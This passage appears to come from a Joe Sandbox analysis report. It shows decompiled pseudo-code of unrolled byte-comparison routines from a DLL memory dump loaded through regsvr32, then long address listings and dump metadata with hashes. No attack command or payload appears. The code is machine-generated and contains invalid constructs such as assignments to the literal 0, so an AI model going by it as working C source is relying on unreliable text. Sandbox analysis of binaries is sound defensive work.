											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

































                                                                                                                0x1003e709
                                                                                                                0x1003e709
                                                                                                                0x1003e70f
                                                                                                                0x1003e78f
                                                                                                                0x1003e791
                                                                                                                0x1003e793
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e799
                                                                                                                0x1003e79f
                                                                                                                0x1003e81e
                                                                                                                0x1003e820
                                                                                                                0x1003e822
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e828
                                                                                                                0x1003e82e
                                                                                                                0x1003e8ad
                                                                                                                0x1003e8af
                                                                                                                0x1003e8b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e8b7
                                                                                                                0x1003e8bd
                                                                                                                0x1003e93c
                                                                                                                0x1003e93e
                                                                                                                0x1003e940
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e94c
                                                                                                                0x1003e9cc
                                                                                                                0x1003e9ce
                                                                                                                0x1003e9d0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e9d6
                                                                                                                0x1003e9dc
                                                                                                                0x1003ea5b
                                                                                                                0x1003ea5d
                                                                                                                0x1003ea5f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ea65
                                                                                                                0x1003ea6b
                                                                                                                0x1003eaea
                                                                                                                0x1003eaec
                                                                                                                0x1003eaee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003eafc
                                                                                                                0x1003eafe
                                                                                                                0x1003e6e1
                                                                                                                0x1003e6e9
                                                                                                                0x1003e6eb
                                                                                                                0x1003e2c7
                                                                                                                0x1003e2cf
                                                                                                                0x1003e2d1
                                                                                                                0x1003e2e2
                                                                                                                0x1003e2e2
                                                                                                                0x1003ded7
                                                                                                                0x1003ec33
                                                                                                                0x1003ec33
                                                                                                                0x1003e6f8
                                                                                                                0x1003e6fe
                                                                                                                0x1003eb17
                                                                                                                0x1003eb17
                                                                                                                0x00000000
                                                                                                                0x1003e704
                                                                                                                0x00000000
                                                                                                                0x1003e704
                                                                                                                0x1003e6fe
                                                                                                                0x1003eb0b
                                                                                                                0x1003eb11
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003eb11
                                                                                                                0x1003ea74
                                                                                                                0x1003ea76
                                                                                                                0x1003ea8d
                                                                                                                0x1003ea95
                                                                                                                0x1003ea97
                                                                                                                0x1003eaae
                                                                                                                0x1003eab6
                                                                                                                0x1003eab8
                                                                                                                0x1003eacf
                                                                                                                0x1003ead7
                                                                                                                0x1003ead9
                                                                                                                0x1003eae6
                                                                                                                0x1003eae6
                                                                                                                0x00000000
                                                                                                                0x1003ead9
                                                                                                                0x1003eac5
                                                                                                                0x1003eac9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003eac9
                                                                                                                0x1003eaa4
                                                                                                                0x1003eaa8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003eaa8
                                                                                                                0x1003ea83
                                                                                                                0x1003ea87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ea87
                                                                                                                0x1003e9e5
                                                                                                                0x1003e9e7
                                                                                                                0x1003e9fe
                                                                                                                0x1003ea06
                                                                                                                0x1003ea08
                                                                                                                0x1003ea1f
                                                                                                                0x1003ea27
                                                                                                                0x1003ea29
                                                                                                                0x1003ea40
                                                                                                                0x1003ea48
                                                                                                                0x1003ea4a
                                                                                                                0x1003ea57
                                                                                                                0x1003ea57
                                                                                                                0x00000000
                                                                                                                0x1003ea4a
                                                                                                                0x1003ea36
                                                                                                                0x1003ea3a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ea3a
                                                                                                                0x1003ea15
                                                                                                                0x1003ea19
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003ea19
                                                                                                                0x1003e9f4
                                                                                                                0x1003e9f8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e9f8
                                                                                                                0x1003e956
                                                                                                                0x1003e958
                                                                                                                0x1003e96f
                                                                                                                0x1003e977
                                                                                                                0x1003e979
                                                                                                                0x1003e990
                                                                                                                0x1003e998
                                                                                                                0x1003e99a
                                                                                                                0x1003e9b1
                                                                                                                0x1003e9b9
                                                                                                                0x1003e9bb
                                                                                                                0x1003e9c8
                                                                                                                0x1003e9c8
                                                                                                                0x00000000
                                                                                                                0x1003e9bb
                                                                                                                0x1003e9a7
                                                                                                                0x1003e9ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e9ab
                                                                                                                0x1003e986
                                                                                                                0x1003e98a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e98a
                                                                                                                0x1003e965
                                                                                                                0x1003e969
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e969
                                                                                                                0x1003e8c6
                                                                                                                0x1003e8c8
                                                                                                                0x1003e8df
                                                                                                                0x1003e8e7
                                                                                                                0x1003e8e9
                                                                                                                0x1003e900
                                                                                                                0x1003e908
                                                                                                                0x1003e90a
                                                                                                                0x1003e921
                                                                                                                0x1003e929
                                                                                                                0x1003e92b
                                                                                                                0x1003e938
                                                                                                                0x1003e938
                                                                                                                0x00000000
                                                                                                                0x1003e92b
                                                                                                                0x1003e917
                                                                                                                0x1003e91b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e91b
                                                                                                                0x1003e8f6
                                                                                                                0x1003e8fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e8fa
                                                                                                                0x1003e8d5
                                                                                                                0x1003e8d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e8d9
                                                                                                                0x1003e837
                                                                                                                0x1003e839
                                                                                                                0x1003e850
                                                                                                                0x1003e858
                                                                                                                0x1003e85a
                                                                                                                0x1003e871
                                                                                                                0x1003e879
                                                                                                                0x1003e87b
                                                                                                                0x1003e892
                                                                                                                0x1003e89a
                                                                                                                0x1003e89c
                                                                                                                0x1003e8a9
                                                                                                                0x1003e8a9
                                                                                                                0x00000000
                                                                                                                0x1003e89c
                                                                                                                0x1003e888
                                                                                                                0x1003e88c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e88c
                                                                                                                0x1003e867
                                                                                                                0x1003e86b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e86b
                                                                                                                0x1003e846
                                                                                                                0x1003e84a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e84a
                                                                                                                0x1003e7a8
                                                                                                                0x1003e7aa
                                                                                                                0x1003e7c1
                                                                                                                0x1003e7c9
                                                                                                                0x1003e7cb
                                                                                                                0x1003e7e2
                                                                                                                0x1003e7ea
                                                                                                                0x1003e7ec
                                                                                                                0x1003e803
                                                                                                                0x1003e80b
                                                                                                                0x1003e80d
                                                                                                                0x1003e81a
                                                                                                                0x1003e81a
                                                                                                                0x00000000
                                                                                                                0x1003e80d
                                                                                                                0x1003e7f9
                                                                                                                0x1003e7fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e7fd
                                                                                                                0x1003e7d8
                                                                                                                0x1003e7dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e7dc
                                                                                                                0x1003e7b7
                                                                                                                0x1003e7bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e711
                                                                                                                0x1003e711
                                                                                                                0x1003e715
                                                                                                                0x1003e719
                                                                                                                0x1003e71b
                                                                                                                0x1003e732
                                                                                                                0x1003e732
                                                                                                                0x1003e736
                                                                                                                0x1003e73a
                                                                                                                0x1003e73c
                                                                                                                0x1003e753
                                                                                                                0x1003e753
                                                                                                                0x1003e757
                                                                                                                0x1003e75b
                                                                                                                0x1003e75d
                                                                                                                0x1003e774
                                                                                                                0x1003e774
                                                                                                                0x1003e778
                                                                                                                0x1003e77c
                                                                                                                0x1003e77e
                                                                                                                0x1003e784
                                                                                                                0x1003e787
                                                                                                                0x1003e78b
                                                                                                                0x1003e78b
                                                                                                                0x00000000
                                                                                                                0x1003e77e
                                                                                                                0x1003e763
                                                                                                                0x1003e766
                                                                                                                0x1003e76a
                                                                                                                0x1003e76e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e76e
                                                                                                                0x1003e742
                                                                                                                0x1003e745
                                                                                                                0x1003e749
                                                                                                                0x1003e74d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e74d
                                                                                                                0x1003e721
                                                                                                                0x1003e724
                                                                                                                0x1003e728
                                                                                                                0x1003e72c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e72c
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction ID: ca44cfd0a9ed2ed662c286f7cfcf6575917ef5e6bc8068de1d2b6de3d8688f10
                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction Fuzzy Hash: DCD160B3C0A9F34E8376C52D405822FEEA2AFC169272BC7E1DCD43F289D6265D0496D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E2E9 Relevance: .4, Instructions: 378COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E2E9(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
